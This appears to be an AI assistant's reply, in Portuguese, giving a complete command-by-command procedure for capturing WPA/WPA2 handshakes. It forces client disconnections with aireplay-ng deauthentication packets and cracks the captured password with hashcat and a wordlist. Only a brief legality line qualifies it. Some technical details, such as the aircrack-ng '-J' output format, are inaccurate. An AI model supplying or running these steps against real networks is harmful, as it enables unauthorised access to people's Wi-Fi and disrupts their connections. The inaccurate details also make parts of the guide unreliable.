Para capturar pacotes de autenticação Wi-Fi (como handshakes WPA/WPA2) e posteriormente tentar quebrá-los com o **Hashcat**, siga os passos abaixo:
---
### **1. Capturar o Handshake Wi-Fi**
Use o **Airodump-ng** (parte do suite `aircrack-ng`) para monitorar redes Wi-Fi e capturar o handshake:
```bash
sudo airmon-ng start wlan0 # Ativar modo monitor (substitua "wlan0" pela sua interface)
sudo airodump-ng wlan0mon # Listar redes Wi-Fi disponíveis
```
Quando encontrar a rede alvo, execute:
```bash
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w <OUTPUT_FILE> wlan0mon
```
- **`-c <CHANNEL>`**: Canal da rede alvo.
- **`--bssid <BSSID>`**: Endereço MAC do roteador.
- **`-w <OUTPUT_FILE>`**: Nome do arquivo de saída (ex: `captura`).
#### **Forçar Captura do Handshake:**
Abra outro terminal e force uma desconexão/reconexão de um cliente usando **aireplay-ng**:
```bash
sudo aireplay-ng -0 4 -a <BSSID> -c <CLIENT_MAC> wlan0mon
```
- **`-0 4`**: Envia 4 pacotes de deautenticação.
- **`-a <BSSID>`**: MAC do roteador.
- **`-c <CLIENT_MAC>`**: MAC do cliente (opcional).
Quando o handshake for capturado, aparecerá `"WPA handshake: <BSSID>"` no **airodump-ng**.
---
### **2. Salvar o Handshake para o Hashcat**
O arquivo `.cap` gerado pode ser convertido para o formato `.hccapx` (compatível com Hashcat) usando:
```bash
aircrack-ng -J <OUTPUT_HCCAPX> <INPUT_CAP>
```
- Exemplo:
```bash
aircrack-ng -J handshake captura-01.cap
```
Isso gerará `handshake.hccapx`.
---
### **3. Quebrar o Handshake com Hashcat**
Use o Hashcat no modo **WPA/WPA2** (modo `22000` para arquivos `.cap` ou `2500` para `.hccapx`):
```bash
hashcat -m 2500 handshake.hccapx wordlist.txt
```
- **`-m 2500`**: Modo WPA/WPA2 (para `.hccapx`).
- **`wordlist.txt`**: Arquivo com senhas para teste (ex: `rockyou.txt`).
#### **Para arquivos `.cap` modernos (Hashcat v6+):**
Converta para `.hc22000` (formato mais novo):
```bash
hcxpcapngtool -o handshake.hc22000 captura-01.cap
```
E use o modo `22000`:
```bash
hashcat -m 22000 handshake.hc22000 wordlist.txt
```
---
### **Observações Importantes:**
- **Legalidade**: Só capture handshakes de redes que você tem permissão para testar.
- **Wordlists**: Use listas eficientes como `rockyou.txt` ou gere senhas com `crunch`.
- **GPU**: Hashcat funciona melhor com GPUs poderosas.
Se precisar de mais detalhes, posso explicar etapas específicas!